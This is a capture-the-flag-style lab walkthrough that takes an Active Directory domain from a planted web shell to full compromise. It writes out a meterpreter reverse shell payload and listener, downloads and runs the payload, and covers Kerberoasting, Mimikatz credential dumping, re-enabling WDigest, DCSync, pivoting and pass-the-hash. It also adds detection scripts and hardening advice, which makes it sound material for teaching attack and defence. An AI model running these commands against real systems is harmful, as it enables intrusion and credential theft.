# AD Enumeration & Attacks - Skills Assessment Part I

**Scenario:**

A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: `admin:My_W3bsH3ll_P@ssw0rd!`) in place for us to start from in the `/uploads` directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.

Let's navigate to <http://ip/uploads> and log in using the credentials provided above.

<figure><img src="/files/MGhDqeTVWkij2aG7RekK" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/PcN3712HWgFi3RvusdQX" alt=""><figcaption></figcaption></figure>

Answer:  JusT\_g3tt1ng\_st\@rt3d!

Q2) Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

To operate more efficiently from our attack machine, we need to establish a reverse shell. Let's generate a reverse shell payload and start the listener.

First, let's identify the system type of the victim machine.

<figure><img src="/files/LtRs3O4xyfGplV2Pjf85" alt=""><figcaption></figcaption></figure>

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.45 LPORT=4444 -f exe -o payload.exe
```

<figure><img src="/files/kd268sFjGDBez0ShVnMg" alt=""><figcaption></figcaption></figure>

Next, let's initiate our listener using Metasploit.

```bash
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.15.45
set LPORT 4444
exploit
```

<figure><img src="/files/xSwz1NEuRoQ3tc7baP6O" alt=""><figcaption></figcaption></figure>

Let's also start an HTTP server to host the payload, allowing it to be downloaded onto the victim machine.

```bash
python3 -m http.server
```

<figure><img src="/files/6FjetY0XKh4uMAWrAKuz" alt=""><figcaption></figcaption></figure>

It is now time to download the payload onto the target machine and execute it.

```powershell
# In PowerShell, curl is an alias for Invoke-WebRequest; -O alone is ambiguous there, so use -OutFile
curl http://10.10.15.45:8000/payload.exe -OutFile C:\Windows\System32\payload.exe
# Run the payload so it calls back to the Metasploit listener
Start-Process C:\Windows\System32\payload.exe
```

<figure><img src="/files/VyKGCNnVlz00E56uvSq7" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/aVtW5hgNIYHCPCku3moH" alt=""><figcaption></figcaption></figure>

Now that we have obtained a reverse shell, we need to use `setspn` to query all Service Principal Names (SPNs) registered within the domain.

```powershell
# Query every SPN registered in the domain (run from the shell on the Windows host)
setspn -Q */*
```

<figure><img src="/files/l4ntgJa4BT1Au0mp9BwK" alt=""><figcaption></figcaption></figure>

Answer:  svc\_sql

Q3) Crack the account's password. Submit the cleartext value.

Let's download PowerView on the Windows system to perform a Kerberoasting attack and extract the service ticket hash for the **svc\_sql** user.

```powershell
# Load PowerView first, then request the svc_sql service ticket in hashcat format
Import-Module .\PowerView.ps1
Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat
```

<figure><img src="/files/LJ0CWhs0fUeOfKO2lMJo" alt=""><figcaption></figcaption></figure>

```bash
# Mode 13100 = Kerberos 5 TGS-REP etype 23 (RC4); svcsql_tgs holds the hash copied from PowerView
hashcat -m 13100 svcsql_tgs /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/i1M4b7zO4BffneYBAPJX" alt=""><figcaption></figcaption></figure>

Answer:  lucky7
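The ticket cracks quickly because the SPN account still accepts RC4 (etype 23), whose key is the account's NT hash, and its password is in rockyou. As an added example that is not part of this write-up, the Python below parses the mode-13100 hash header to confirm the encryption type and then runs two detections over constructed Security event 4769 records: every RC4 ticket issued for a user service account (which catches the single request made here) and bursts of such requests from one source, which is what a mass Kerberoast looks like. Event field names follow the 4769 event XML; the hash payload, the requester `webuser`, the `svc_backup`/`svc_web` accounts, the IPs and the timestamps are constructed.

```python
"""Spot Kerberoast-style service ticket requests in Windows Security event 4769.

Added example, not code from the original write-up. The hash line and the events
below are constructed samples, not lab records; event field names follow the 4769
event XML (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, TimeCreated).
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType for RC4-HMAC, the tickets hashcat mode 13100 cracks

# Constructed line in the layout PowerView's -Format Hashcat emits for etype 23:
# $krb5tgs$<etype>$*<user>$<realm>$<spn>*$<checksum>$<edata>   (hex payload shortened)
SAMPLE_HASH = (
    "$krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433*"
    "$0123456789abcdef0123456789abcdef$deadbeefdeadbeefdeadbeefdeadbeef"
)


def parse_krb5tgs_header(hash_line):
    """Return (etype, user, realm, spn) from a mode-13100 hash line.

    etype 23 means the ticket is sealed with the account's RC4 key, which is the
    NT hash of its password; that is what makes offline guessing cheap.
    """
    parts = hash_line.split("$")
    if len(parts) < 8 or parts[1] != "krb5tgs":
        raise ValueError("not a $krb5tgs$ line")
    return int(parts[2]), parts[3].lstrip("*"), parts[4], parts[5].rstrip("*")


def is_user_service_account(service_name):
    """Computer accounts (trailing $) and krbtgt are not the Kerberoast target set."""
    name = service_name.lower()
    return not name.endswith("$") and name != "krbtgt"


def rc4_user_spn_requests(events):
    """Low-volume signal: every RC4 ticket issued for a user service account.
    A single request, like the one for svc_sql above, only shows up here."""
    return [
        (e["TargetUserName"], e["ServiceName"], e["IpAddress"])
        for e in events
        if e["TicketEncryptionType"] == RC4_HMAC and is_user_service_account(e["ServiceName"])
    ]


def kerberoast_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Higher-confidence signal: one requester pulling RC4 tickets for at least
    `threshold` distinct user service accounts inside `window`.
    Returns {(requester, ip): [service names]}."""
    per_source = defaultdict(list)
    for e in events:
        if e["TicketEncryptionType"] != RC4_HMAC or not is_user_service_account(e["ServiceName"]):
            continue
        ts = datetime.fromisoformat(e["TimeCreated"])
        per_source[(e["TargetUserName"], e["IpAddress"])].append((ts, e["ServiceName"]))
    bursts = {}
    for key, requests in per_source.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):
            services = {svc for ts, svc in requests[i:] if ts - start <= window}
            if len(services) >= threshold:
                bursts[key] = sorted(services)
                break
    return bursts


def _ev(time, user, service, etype, ip):
    """Build a constructed 4769 record (helper for the samples below)."""
    return {"TimeCreated": time, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip}


SAMPLE_EVENTS = [  # constructed: webuser, svc_backup, svc_web, the IPs and times are made up
    _ev("2024-05-01T10:00:01", "webuser@INLANEFREIGHT.LOCAL", "svc_sql", 0x17, "10.0.0.5"),
    _ev("2024-05-01T10:00:02", "webuser@INLANEFREIGHT.LOCAL", "svc_backup", 0x17, "10.0.0.5"),
    _ev("2024-05-01T10:00:05", "webuser@INLANEFREIGHT.LOCAL", "svc_web", 0x17, "10.0.0.5"),
    _ev("2024-05-01T10:00:03", "jdoe@INLANEFREIGHT.LOCAL", "MS01$", 0x12, "10.0.0.7"),    # AES256, computer SPN
    _ev("2024-05-01T10:00:06", "jdoe@INLANEFREIGHT.LOCAL", "krbtgt", 0x17, "10.0.0.7"),   # TGT renewal, ignored
    _ev("2024-05-01T11:30:00", "jdoe@INLANEFREIGHT.LOCAL", "svc_sql", 0x17, "10.0.0.7"),  # lone request, no burst
]

if __name__ == "__main__":
    print("hash header:", parse_krb5tgs_header(SAMPLE_HASH))
    for requester, service, ip in rc4_user_spn_requests(SAMPLE_EVENTS):
        print(f"RC4 ticket for user SPN account {service} requested by {requester} from {ip}")
    for (requester, ip), services in kerberoast_bursts(SAMPLE_EVENTS).items():
        print(f"possible Kerberoast burst: {requester} from {ip} -> {services}")
```

The two signals are deliberately separate: the burst rule is quiet enough to page on, while the per-ticket list is something to review when an SPN account has a weak password. The fix on the account side is to move `svc_sql` to a long random password or a group managed service account and restrict it to AES (`msDS-SupportedEncryptionTypes`), after which the 4769 events carry etype 0x12 and the hash is no longer a mode-13100 candidate.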

Q4) Submit the contents of the flag.txt file on the Administrator desktop on MS01

```powershell
# Map the admin share on MS01 with the cracked svc_sql password, then read the flag
net use \\MS01\c$ /user:INLANEFREIGHT.LOCAL\svc_sql lucky7
type \\MS01\c$\Users\Administrator\Desktop\flag.txt
```

<figure><img src="/files/Po9FZ51qXj6svlDM9E1A" alt=""><figcaption></figcaption></figure>

Answer:  spn$*r0ast1ng\_on*@n\_0p3n\_f1re

Q5) Find cleartext credentials for another domain user. Submit the username as your answer.

Next, we need to connect to **MS01.INLANEFREIGHT.LOCAL** using the credentials we previously obtained. Since we do not have direct access to this machine, we will first set up a port forwarding rule to enable RDP access from our attacker machine.

<figure><img src="/files/266z8gq4uEL5z8tc46Az" alt=""><figcaption></figcaption></figure>

Here is the IP address of the MS01 computer, which will be used as the connection IP address.

```powershell
# Listen on the external web server (10.129.253.79:8888) and forward to RDP on MS01 (172.16.6.50:3389)
netsh.exe interface portproxy add v4tov4 listenport=8888 listenaddress=10.129.253.79 connectport=3389 connectaddress=172.16.6.50
```

<figure><img src="/files/XWFcVWHVR6Sdpgz6iQAd" alt=""><figcaption></figcaption></figure>

Let's initiate a connection using RDP.

```bash
xfreerdp /u:svc_sql /p:lucky7 /v:10.129.253.79:8888 /dynamic-resolution /drive:Shared,/home/htb-ac-1224655/
```

<figure><img src="/files/Z05PUXxPP2ps1RGEp6U3" alt=""><figcaption></figcaption></figure>

I used the `/drive` option so that our tools directory is reachable from inside the RDP session.

<figure><img src="/files/mwzKpLTGEFS3LGoS2svI" alt=""><figcaption></figcaption></figure>

Now, let's use Mimikatz to retrieve the cleartext password.

```powershell
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
```

<figure><img src="/files/7bLTCthpAUEzmd8aow4m" alt=""><figcaption></figcaption></figure>

Mimikatz shows a blank password here, which tells us WDigest credential caching is disabled (`UseLogonCredential` is 0 or absent). When it is enabled, the WDigest authentication package keeps a cleartext copy of each logged-on user's password in LSASS memory, which tools like Mimikatz can read out.

Answer:  tpetty

Q6) Submit this user's cleartext password.

We enable WDigest credential caching in the registry. The change only affects logons that happen after it, so we then restart the computer.

```powershell
# Turn WDigest plaintext caching on (/f overwrites an existing value without prompting)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
# Reboot immediately so the next logon is cached in cleartext
shutdown.exe /r /t 0 /f
```

<figure><img src="/files/j5eWmscHYg8ZJDPDkJgv" alt=""><figcaption></figcaption></figure>
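The registry write above is also what a defender watches for: Sysmon Event ID 13 (RegistryEvent, Value Set) records the change, and `UseLogonCredential` flipping to 1 on a member server is a high-signal event. The following Python is an added example, not code from this write-up: it flags any Value Set that turns WDigest caching on and encodes the hardened state (0, or the value absent on Windows 8.1 / Server 2012 R2 and later). The records are constructed samples shaped like Sysmon 13 fields; the `DWORD (0x...)` rendering of `Details` and the host, user and image values are assumptions.

```python
"""Flag re-enabling of WDigest plaintext caching from Sysmon Event ID 13 (Value Set).

Added example, not code from the original write-up. Records below are constructed
samples shaped like Sysmon 13 fields (EventType, TargetObject, Details, Image, User,
Computer, UtcTime); the "DWORD (0x...)" rendering of Details is an assumption.
"""
import re

# The value the write-up sets to 1; Sysmon may report CurrentControlSet or ControlSet00N
WDIGEST_VALUE = re.compile(
    r"^HKLM\\SYSTEM\\(CurrentControlSet|ControlSet\d{3})\\Control\\SecurityProviders"
    r"\\WDigest\\UseLogonCredential$",
    re.IGNORECASE,
)
DWORD_DETAILS = re.compile(r"DWORD \((0x[0-9a-fA-F]+)\)")


def parse_dword(details):
    """Pull the integer out of a 'DWORD (0x00000001)' Details string, else None."""
    m = DWORD_DETAILS.search(details)
    return int(m.group(1), 16) if m else None


def wdigest_is_hardened(value):
    """0 is the secure setting. Absent (None) is also secure on Windows 8.1 / Server
    2012 R2 and later, where caching is off by default. 1 puts cleartext in LSASS."""
    return value in (None, 0)


def wdigest_tamper_alerts(events):
    """Return one alert dict per SetValue that turns UseLogonCredential on."""
    alerts = []
    for e in events:
        if e.get("EventID") != 13 or e.get("EventType") != "SetValue":
            continue
        if not WDIGEST_VALUE.match(e["TargetObject"]):
            continue
        value = parse_dword(e["Details"])
        if not wdigest_is_hardened(value):
            alerts.append({"time": e["UtcTime"], "host": e["Computer"], "user": e["User"],
                           "image": e["Image"], "value": value})
    return alerts


def _event(value_name, details, control_set="CurrentControlSet"):
    """Build a constructed Sysmon 13 record (helper for the samples below)."""
    key = f"HKLM\\System\\{control_set}\\Control\\SecurityProviders\\WDigest\\{value_name}"
    return {"EventID": 13, "EventType": "SetValue", "UtcTime": "2024-05-01 12:00:00.000",
            "Computer": "MS01.INLANEFREIGHT.LOCAL", "User": "INLANEFREIGHT\\svc_sql",
            "Image": "C:\\Windows\\System32\\reg.exe", "TargetObject": key, "Details": details}


SAMPLE_EVENTS = [  # constructed samples
    _event("UseLogonCredential", "DWORD (0x00000001)"),                   # the change made above
    _event("UseLogonCredential", "DWORD (0x00000000)"),                   # hardening it back: no alert
    _event("Negotiate", "DWORD (0x00000000)"),                            # unrelated value, same key
    _event("UseLogonCredential", "DWORD (0x00000001)", "ControlSet001"),  # alternate key rendering
]

if __name__ == "__main__":
    for a in wdigest_tamper_alerts(SAMPLE_EVENTS):
        print(f"{a['time']} {a['host']}: {a['user']} set UseLogonCredential={a['value']} via {a['image']}")
```

Pairing this with a reboot event (Security 1074) from the same host within a few minutes raises the confidence further, since the write-up's sequence is exactly "set the value, then force a restart". The durable fix is to keep the value at 0 (or remove it) through Group Policy and, on supported builds, to enable LSA protection and Credential Guard so LSASS memory is not readable even by an administrator.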

Now that we’ve logged in again, let’s repeat the same steps we performed using Mimikatz and review the results.

<figure><img src="/files/kTwcMhl2rrnGW4bZeP3d" alt=""><figcaption></figcaption></figure>

Answer:  Sup3rS3cur3D0m\@inU2eR

Q7) What attack can this user perform?

Let's enumerate the user's access control list to determine their permissions and capabilities.

```powershell
Import-Module .\PowerView.ps1
$sid = Convert-NameToSid tpetty
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
```

<figure><img src="/files/FvZEMQoujkVBVtPaxDCi" alt=""><figcaption></figcaption></figure>

Answer:  DCSync

Q8) Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

We will now use Mimikatz to perform a DCSync attack to retrieve the hash of the Administrator account. Before proceeding, we need to run the command as the user **tpetty**.

```powershell
# Open a PowerShell window as tpetty, then launch Mimikatz from inside it
runas /user:INLANEFREIGHT\tpetty powershell.exe
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
```

<figure><img src="/files/pardJ9JDlgGcEIjWEic7" alt=""><figcaption></figcaption></figure>
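The ACL query in Q7 and the DCSync in Q8 are two sides of the same control: a principal that holds the replication extended rights on the domain object can pull every account's secrets from a DC. As an added example that is not part of this write-up, the Python below audits a list of ACEs for replication rights held outside an expected baseline, and separately flags Security event 4662 records where a non-DC account exercised those rights, which is the log trace a DCSync leaves. The ACE dicts mimic the `SecurityIdentifier`, `ActiveDirectoryRights` and `ObjectAceType` fields PowerView's `Get-DomainObjectACL` returns; the 4662 dicts mimic the Security log fields. The domain SID, RIDs, the `jdoe` and `MSOL_a1b2c3` accounts, and the baseline of expected principals are constructed or are assumptions to tune for your forest; the right GUIDs are the well-known Active Directory control access rights.

```python
"""Audit DCSync (replication) rights on the domain object and flag 4662 replication
events from accounts that are not domain controllers.

Added example, not code from the original write-up. ACE dicts mimic PowerView's
Get-DomainObjectACL fields; 4662 dicts mimic Security log fields. SIDs, RIDs, the
non-tpetty names and the expected-principal baseline are constructed/assumptions.
"""
import re

REPLICATION_RIGHTS = {  # well-known control access right GUIDs
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
ALL_EXTENDED_RIGHTS = "00000000-0000-0000-0000-000000000000"  # ExtendedRight + null GUID = every extended right
GUID_RE = re.compile(r"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})", re.IGNORECASE)

# Baseline that legitimately replicates (assumption: extend for e.g. an Azure AD Connect account)
EXPECTED_SIDS = {"S-1-5-32-544", "S-1-5-9", "S-1-5-18"}  # BUILTIN\Administrators, Enterprise DCs, SYSTEM
EXPECTED_DOMAIN_RIDS = {"512", "516", "519", "498"}       # Domain Admins, Domain Controllers, Enterprise Admins, Enterprise RODCs


def is_expected_principal(sid):
    if sid in EXPECTED_SIDS:
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[-1] in EXPECTED_DOMAIN_RIDS


def unexpected_replication_rights(aces):
    """{sid: [right names]} for principals outside the baseline that can DCSync."""
    found = {}
    for ace in aces:
        sid, rights = ace["SecurityIdentifier"], ace["ActiveDirectoryRights"]
        if is_expected_principal(sid):
            continue
        if "GenericAll" in rights:
            found.setdefault(sid, set()).add("GenericAll (implies all replication rights)")
        elif "ExtendedRight" in rights:
            guid = ace["ObjectAceType"].lower()
            if guid == ALL_EXTENDED_RIGHTS:
                found.setdefault(sid, set()).add("All extended rights (implies replication)")
            elif guid in REPLICATION_RIGHTS:
                found.setdefault(sid, set()).add(REPLICATION_RIGHTS[guid])
    return {sid: sorted(names) for sid, names in found.items()}


def dcsync_alerts(events, allowlist=frozenset()):
    """4662 control-access (0x100) events naming a replication right, raised by a
    subject that is neither a computer account (trailing $) nor allowlisted."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4662 or not int(e["AccessMask"], 16) & 0x100:
            continue
        rights = sorted(REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(e["Properties"])
                        if g.lower() in REPLICATION_RIGHTS)
        subject = e["SubjectUserName"]
        if rights and not subject.endswith("$") and subject not in allowlist:
            alerts.append((subject, e["SubjectDomainName"], rights))
    return alerts


def _ace(sid, rights, guid):
    return {"SecurityIdentifier": sid, "ActiveDirectoryRights": rights, "ObjectAceType": guid}


def _4662(subject, domain, mask, guids):
    """Constructed 4662 record; Properties lists the accessed right GUIDs in braces."""
    props = "%%7688\n\t" + "\n\t".join("{" + g + "}" for g in guids)
    return {"EventID": 4662, "SubjectUserName": subject, "SubjectDomainName": domain,
            "AccessMask": mask, "Properties": props}


DOMAIN = "S-1-5-21-1111-2222-3333"  # constructed domain SID; RID 1105 stands in for tpetty
SAMPLE_ACES = [
    _ace("S-1-5-32-544", "ExtendedRight", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    _ace(DOMAIN + "-516", "ExtendedRight", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    _ace(DOMAIN + "-1105", "ExtendedRight", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    _ace(DOMAIN + "-1105", "ExtendedRight", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    _ace(DOMAIN + "-1106", "ReadProperty, GenericExecute", ALL_EXTENDED_RIGHTS),  # harmless
]
SAMPLE_4662 = [
    _4662("DC01$", "INLANEFREIGHT", "0x100", ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]),      # DC replicating
    _4662("MSOL_a1b2c3", "INLANEFREIGHT", "0x100", ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]),  # constructed sync account
    _4662("tpetty", "INLANEFREIGHT", "0x100", ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                                               "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]),
    _4662("jdoe", "INLANEFREIGHT", "0x10", ["12345678-1234-1234-1234-123456789abc"]),       # ordinary read, made-up GUID
]

if __name__ == "__main__":
    print("unexpected replication rights:", unexpected_replication_rights(SAMPLE_ACES))
    print("DCSync alerts:", dcsync_alerts(SAMPLE_4662, allowlist={"MSOL_a1b2c3"}))
```

The 4662 rule needs "Audit Directory Service Access" enabled on the domain controllers, and it stays noisy until the legitimate replicators (DC computer accounts, any directory sync service) are allowlisted. The ACL audit is the preventive half: stripping the two `DS-Replication-Get-Changes*` rights from `tpetty` removes the condition the write-up exploits, and re-running the audit on a schedule catches the right being granted again.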

We have obtained the administrator's hash, which can be used directly for authentication. However, before proceeding, we need to verify which ports are open on the domain controller at `172.16.6.3`.

```bash
# Typed at the meterpreter > prompt of the existing session
run autoroute -s 172.16.6.3
run autoroute -p
```

<figure><img src="/files/8EBl1dnX2WxVJSzUBU0j" alt=""><figcaption></figcaption></figure>

The `autoroute` post module tells Metasploit to route traffic for `172.16.6.3` (added with the default /24 netmask, so the whole `172.16.6.0/24` range) through the compromised host via the Meterpreter session.

Next, let's conduct a port scan to identify the open ports.

```bash
# Background the Meterpreter session first, then run the scanner from the msf6 > prompt
use auxiliary/scanner/portscan/tcp
set rhosts 172.16.6.3
exploit
```

I discovered that port 5985 is open, which is the default port for WinRM over HTTP. However, before connecting from our attacking machine, we need to set up port forwarding.

```bash
# In the Meterpreter session: local port 6666 on the attack machine -> 172.16.6.3:5985
portfwd add -l 6666 -p 5985 -r 172.16.6.3
```

<figure><img src="/files/hMT2DPyAj72rOFkEQaeo" alt=""><figcaption></figcaption></figure>

Next, we use `Evil-WinRM` from the attacking machine, through the local forward on port 6666, to connect to the domain controller with the Administrator NT hash we just dumped (pass-the-hash).

```bash
evil-winrm -i 10.10.15.16 --port 6666 -u administrator -H 27dedb1dab4d8545c6e1c66fba077da0
```

<figure><img src="/files/HLR4ay3SqJtKdLITduGL" alt=""><figcaption></figcaption></figure>

Answer:  r3plicat1on\_m\@st3r!

